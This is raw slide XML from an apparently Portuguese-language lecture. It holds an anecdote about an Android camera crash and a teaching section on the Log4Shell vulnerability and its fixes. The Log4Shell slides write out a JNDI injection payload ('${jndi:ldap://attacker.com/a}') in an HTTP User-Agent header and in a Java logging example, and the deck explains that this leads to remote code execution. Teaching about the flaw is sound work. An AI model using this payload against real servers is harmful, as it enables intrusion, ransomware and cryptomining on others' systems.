          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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45" name="Google Shape;145;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627425" y="4740100"/>
            <a:ext cx="35478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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://news.ycombinator.com/item?id=40685157</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454525" y="824500"/>
            <a:ext cx="8245800" cy="398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900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We were developing an Android multimedia application, and our QA person was running into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
              </a:rPr>
              <a:t>a crash recording with the camera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in our app.</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>She walked over to my desk to show me, and the crash wouldn't happen anymore. Went back to her desk and was able to reproduce it again, walked back to my desk and suddenly it wouldn't happen anymore.</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After a bit of this, I finally brought my laptop over to her desk and discovered it was an out of memory error issue. </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>She sat by the window, and with more sunlight at her desk she was getting higher frames per second from the camera, whereas in my dark corner the camera was recording way fewer frames and using less memory.</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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0" name="Shape 660"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Google Shape;661;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616500" y="445025"/>
            <a:ext cx="3006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Log4J Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="662" name="Google Shape;662;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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663" name="Google Shape;663;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587475" y="3671650"/>
            <a:ext cx="5679600" cy="10158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sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Host: victim.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>${jndi:ldap://attacker.com/a}</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Google Shape;664;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="587475" y="1459450"/>
            <a:ext cx="5679600" cy="10158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sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Host: example.com</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Mozilla/5.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Google Shape;665;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2922850" y="2752500"/>
            <a:ext cx="4653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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vs</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666" name="Google Shape;666;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474475" y="1854800"/>
            <a:ext cx="20571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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="D9EAD3"/>
                </a:highlight>
              </a:rPr>
              <a:t>Acesso normal</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="D9EAD3"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Google Shape;667;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6474475" y="3912200"/>
            <a:ext cx="25662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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EA9999"/>
                </a:highlight>
              </a:rPr>
              <a:t>Acesso malicioso</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EA9999"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="668" name="Google Shape;668;p94"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3072050" y="781225"/>
            <a:ext cx="1606200" cy="1299000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Google Shape;669;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4841875" y="373850"/>
            <a:ext cx="41691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rPr>
              <a:t>Informação que normalmente é logada </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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AFAFA"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="673" name="Shape 673"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Google Shape;674;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4095400" y="679325"/>
            <a:ext cx="7344600" cy="85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Proxima Nova"/>
              <a:ea typeface="Proxima Nova"/>
              <a:cs typeface="Proxima Nova"/>
              <a:sym typeface="Proxima Nova"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Google Shape;675;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147325" y="391075"/>
            <a:ext cx="6481800" cy="780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solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>String data = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>${jndi:ldap://attacker.com/a}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="434343"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>logger.info(data);</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Google Shape;676;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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677" name="Google Shape;677;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386375" y="1698450"/>
            <a:ext cx="5724900" cy="7803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en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Acessa um servidor remoto e  baixa código (objeto serializável), que vai ser então executado localmente.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Google Shape;678;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773025" y="3233625"/>
            <a:ext cx="5275200" cy="1015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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Code Execution (RCE), Remote Shell</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ransomware, Cryptomining</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="679" name="Google Shape;679;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4037950" y="2537025"/>
            <a:ext cx="286200" cy="4827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80" name="Google Shape;680;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4037950" y="1241625"/>
            <a:ext cx="286200" cy="4827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4" name="Shape 684"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="685" name="Google Shape;685;p9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Causa da vulnerabilidade</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="686" name="Google Shape;686;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1118400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Servidores afetados não faziam nenhuma "sanitização" nos dados recebidos de clientes</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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1" name="Shape 691"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="692" name="Google Shape;692;p9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Log4Shell: Poss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>íveis soluções</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="693" name="Google Shape;693;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8689500" cy="1118400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sanitizar os dados recebidos de clientes (não podem conter a string "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>jndi:ldap")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Desabilitar JNDI lookups  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>-Dlog4j2.formatMsgNoLookups=true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Fazer upgrade para Log4J 2.15.0</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Google Shape;694;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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695" name="Google Shape;695;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100700" y="3251625"/>
            <a:ext cx="7161300" cy="1194300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF2CC"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
